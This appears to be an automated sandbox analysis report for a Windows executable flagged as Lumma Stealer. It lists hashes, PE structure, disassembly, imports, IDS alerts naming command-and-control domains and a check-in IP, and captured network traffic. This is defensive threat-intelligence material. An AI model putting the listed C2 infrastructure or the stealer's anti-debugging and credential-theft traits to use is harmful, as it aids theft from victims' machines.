                                                                                                                                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4608
                                                                                                                                                                                                            Entropy (8bit):3.943742592537296
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6bprPtxM7Jt8Bs3FJsdcV4MKe27/cSy5vqBHOOulajfqXSfbNtm:yPwPc+Vx9M/q5vkocjRzNt
                                                                                                                                                                                                            MD5:75FB40821ACB3A4C7FE69625132E44AD
                                                                                                                                                                                                            SHA1:17A610446A81488819EEC1639EF9D2F9DF1E3AF5
                                                                                                                                                                                                            SHA-256:DE308997679FE4A7260C26A6B60EBA045B3C7C001BF0402082FFA8DB44D43932
                                                                                                                                                                                                            SHA-512:3C035068FE9DEE0B018B71EC0C8D6D25C79EA0A072E36E0DBCC5C5E631A457CC3921D4C572FB8871D2C509987FFC25AD09401B886E5E56C2587E6BE4C4B6F3DC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                                                                                            Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23
                                                                                                                                                                                                            Entropy (8bit):2.5600289361122233
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:oWEMo6vvRya:oWEpKvD
                                                                                                                                                                                                            MD5:198AA7622D86723F12D39AA38A10C97F
                                                                                                                                                                                                            SHA1:B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
                                                                                                                                                                                                            SHA-256:88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
                                                                                                                                                                                                            SHA-512:8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:012340..1..2..3..4.....
                                                                                                                                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):151
                                                                                                                                                                                                            Entropy (8bit):4.885185687834986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FX5cUz9MTUxvrMTCvrv:Vx993DEU+c62bw
                                                                                                                                                                                                            MD5:B04FA6D98A844BC309F65833664659D7
                                                                                                                                                                                                            SHA1:514F523A3D056551C02691D7BA6EC4032CB06887
                                                                                                                                                                                                            SHA-256:05A8B8C33FC9E4CC0398EACF29D846B1F0F70DA679AC6C775A0FBF39DEDB41DF
                                                                                                                                                                                                            SHA-512:85EA097358EE421C022DF3D56322A8E47AF6B9E1DF2A197FF421B935F42ECF0EFFF6C1826CD46FACC4B9B57374E20FEF6E2E3E37B42CBE0B76238F11FF892C89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/09/2024 16:15:41..16:15:41, error: 0x800705B4.16:15:47, error: 0x800705B4.
                                                                                                                                                                                                            File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.723149882634922
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:NCTSgL4t0B.exe
                                                                                                                                                                                                            File size:628'224 bytes
                                                                                                                                                                                                            MD5:76b682b895587819cc3293cc109d3eb1
                                                                                                                                                                                                            SHA1:80e12ef0083ea82fcd3976e520c8f5bee908b830
                                                                                                                                                                                                            SHA256:6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e
                                                                                                                                                                                                            SHA512:98645f0baced271f25edd659fad2882f8e73ede2d4427ec16e0deb80b8a2e2a67c2e9bebad0f392ff657c0d14da1019f84fc4dc57e39f49904acbec5a0af0aa5
                                                                                                                                                                                                            SSDEEP:12288:pvBZGNqtyONdkGDFDHy0UxCj2AqeMQmHnktO6W7:lnNt7dkmy0uGKFHnktO5
                                                                                                                                                                                                            TLSH:B7D49D4573A58BA8D277617894BBA31BF733B848177186CB63D040682FE23D05EBB752
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...[...[...[...#...[.......[.......[.......[.......[...#...[...[...Z.......[....k..[.......[..Rich.[..........PE..d....3.f...
                                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                                            Entrypoint:0x14004b23c
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x66F433BB [Wed Sep 25 16:00:59 2024 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:33ad68eb40469004473e3e2f94db1647
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                            call 00007F750506C76Ch
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                            jmp 00007F750506C097h
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            mov dword ptr [esp+10h], ebx
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            mov dword ptr [esp+18h], esi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            sub esp, 10h
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                            cpuid
                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                            mov edx, edx
                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                            xor edx, 49656E69h
                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                            xor eax, 6C65746Eh
                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                            mov ecx, ebx
                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                            mov esi, eax
                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                            cpuid
                                                                                                                                                                                                            inc ebp
                                                                                                                                                                                                            or edx, eax
                                                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                            xor ecx, 756E6547h
                                                                                                                                                                                                            mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                                            inc ebp
                                                                                                                                                                                                            or edx, ecx
                                                                                                                                                                                                            mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                                            mov edi, ecx
                                                                                                                                                                                                            mov dword ptr [ebp-04h], edx
                                                                                                                                                                                                            jne 00007F750506C27Dh
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            or dword ptr [00030DEDh], FFFFFFFFh
                                                                                                                                                                                                            and eax, 0FFF3FF0h
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            mov dword ptr [00030DD5h], 00008000h
                                                                                                                                                                                                            cmp eax, 000106C0h
                                                                                                                                                                                                            je 00007F750506C24Ah
                                                                                                                                                                                                            cmp eax, 00020660h
                                                                                                                                                                                                            je 00007F750506C243h
                                                                                                                                                                                                            cmp eax, 00020670h
                                                                                                                                                                                                            je 00007F750506C23Ch
                                                                                                                                                                                                            add eax, FFFCF9B0h
                                                                                                                                                                                                            cmp eax, 20h
                                                                                                                                                                                                            jnbe 00007F750506C246h
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            mov ecx, 00010001h
                                                                                                                                                                                                            add dword ptr [eax], eax
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                            bt ecx, eax
                                                                                                                                                                                                            jnc 00007F750506C236h
                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                            mov eax, dword ptr [0004D26Fh]
                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                            or eax, 01h
                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                            mov dword ptr [0004D264h], eax
                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x794540x1a4.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x1e8.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x990000x2dfc.pdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9d0000x240.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x72e900x70.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x72f000x28.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x72d500x140.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x4e0000x850.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x4c3b70x4c400007994516b8b64d37c353be2ff857c12False0.5010149846311476data6.498864326562007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x4e0000x2d8940x2da00cf4718c34477eb02401f822752dcfa0cFalse0.7480040667808219dBase III DBT, version number 0, next free block index 500742, 1st item "f\236\007"6.924899756763114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x7c0000x1cca80x1c000f13a88c05fff82e9960b245db39e9c54False0.45473807198660715data5.382533114866348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .pdata0x990000x2dfc0x2e00dd958cd6dece03af5616525e3bc5e1e7False0.47121263586956524data5.745616690104214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rsrc0x9c0000x1e80x200031246ef171793b1fc79b2206b5d8bccFalse0.54296875data4.768131151703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .reloc0x9d0000x2400x4008db61ed6d2715dbd01063ff3f53d634bFalse0.3994140625data3.614719584000072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_MANIFEST0x9c0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            d3d9.dllDirect3DCreate9Ex
                                                                                                                                                                                                            KERNEL32.dllVirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
                                                                                                                                                                                                            USER32.dllEmptyClipboard, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetClientRect, SetCursor, ClientToScreen, GetActiveWindow, ScreenToClient, SetClipboardData, GetKeyState, SendInput, UpdateWindow, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, SetLayeredWindowAttributes, CreateWindowExA, DefWindowProcA, GetForegroundWindow, GetClipboardData, LoadCursorA, MessageBoxA, SetWindowLongA, GetWindow, DispatchMessageA, GetAsyncKeyState, GetWindowRect, DestroyWindow, SetWindowPos, ShowWindow, GetSystemMetrics
                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation
                                                                                                                                                                                                            IMM32.dllImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
                                                                                                                                                                                                            MSVCP140.dll_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
                                                                                                                                                                                                            ntdll.dllRtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                                                                                                                                                                                                            dwmapi.dllDwmExtendFrameIntoClientArea
                                                                                                                                                                                                            VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                                                                                                                                            VCRUNTIME140.dll__std_terminate, _CxxThrowException, strstr, __C_specific_handler, __std_exception_destroy, memset, __std_exception_copy, memchr, __current_exception, __current_exception_context, memcmp, memmove, memcpy
                                                                                                                                                                                                            api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
                                                                                                                                                                                                            api-ms-win-crt-string-l1-1-0.dllstrncpy, isprint, strcmp, _stricmp
                                                                                                                                                                                                            api-ms-win-crt-utility-l1-1-0.dllqsort, rand
                                                                                                                                                                                                            api-ms-win-crt-heap-l1-1-0.dll_callnewh, _set_new_mode, malloc, free
                                                                                                                                                                                                            api-ms-win-crt-convert-l1-1-0.dllatof
                                                                                                                                                                                                            api-ms-win-crt-runtime-l1-1-0.dllsystem, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
                                                                                                                                                                                                            api-ms-win-crt-math-l1-1-0.dllasin, floorf, fmodf, powf, sinf, sqrt, __setusermatherr, atan2, sqrtf, pow, tanf, atan2f, ceilf, cosf
                                                                                                                                                                                                            api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
                                                                                                                                                                                                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale, ___lc_codepage_func
                                                                                                                                                                                                            SHELL32.dllShellExecuteW
                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-09-30T18:33:35.150866+02002056172ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)1192.168.2.7517201.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.223222+02002056054ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)1192.168.2.7504031.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.239060+02002056040ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)1192.168.2.7607591.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.254192+02002056056ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)1192.168.2.7546361.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.268714+02002056036ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)1192.168.2.7654401.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.282658+02002056058ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)1192.168.2.7640241.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.295906+02002056046ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)1192.168.2.7588501.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.312038+02002056042ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)1192.168.2.7496941.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:35.325816+02002056052ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)1192.168.2.7519561.1.1.153UDP
                                                                                                                                                                                                            2024-09-30T18:33:37.618210+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749706172.67.197.40443TCP
                                                                                                                                                                                                            2024-09-30T18:33:37.618210+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749706172.67.197.40443TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.944283009 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.944339037 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.944399118 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.962954044 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.962989092 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.459665060 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.459770918 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.467788935 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.467827082 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.468233109 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.471333027 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.511414051 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604137897 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604233027 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604283094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604281902 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604317904 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604357004 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604363918 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604409933 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604444981 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604451895 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604497910 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604532957 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.604538918 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.608771086 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.608820915 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.608834028 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.608865023 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.608902931 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.695986032 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.696146011 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.696178913 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.696192026 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.696222067 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.696260929 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                                                            Sep 30, 2024 18:33:29.696300983 CEST44349701188.114.96.3192.168.2.7
